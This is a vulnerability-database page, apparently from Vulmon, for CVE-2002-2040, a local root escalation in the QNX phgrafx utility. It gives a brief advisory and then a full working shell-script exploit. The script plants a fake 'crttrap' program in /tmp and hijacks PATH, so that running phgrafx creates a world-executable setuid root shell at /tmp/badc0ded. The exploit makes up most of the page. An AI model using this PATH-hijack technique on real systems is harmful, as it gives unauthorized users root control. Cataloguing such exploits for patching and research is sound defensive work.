Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2002-2040

Publish Date: 03 Jun 2002

Author: badc0ded

                source: http://www.securityfocus.com/bid/4915/info

The QNX phgrafx utility is prone to an issue which may make it possible for local attackers to escalate privileges. This issue is due to unsafe use of the system() function to invoke other programs. This vulnerability may be trivially exploited to gain root privileges.

#!/bin/sh
#
# click advanced,done, apply, accept and done. 
# now you should have a setuid root shell waiting in /tmp/badc0ded
#
# www.badc0ded.com
echo "#!/bin/sh" &gt; /tmp/crttrap
echo "cp /bin/sh /tmp/badc0ded" &gt;&gt; /tmp/crttrap
echo "chmod 4777 /tmp/badc0ded" &gt;&gt; /tmp/crttrap
echo "/usr/bin/crttrap \$1 \$2 \$3 \$4 \$5 \$6 \$7 \$8 \$9 " &gt;&gt; /tmp/crttrap
chmod 755 /tmp/crttrap
export PATH="/tmp:$PATH"
/usr/photon/bin/phgrafx

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

QNX RTOS 4.25/6.1 - 'phgrafx' Local Privilege Escalation

Vulmon Search

About

Products

Connect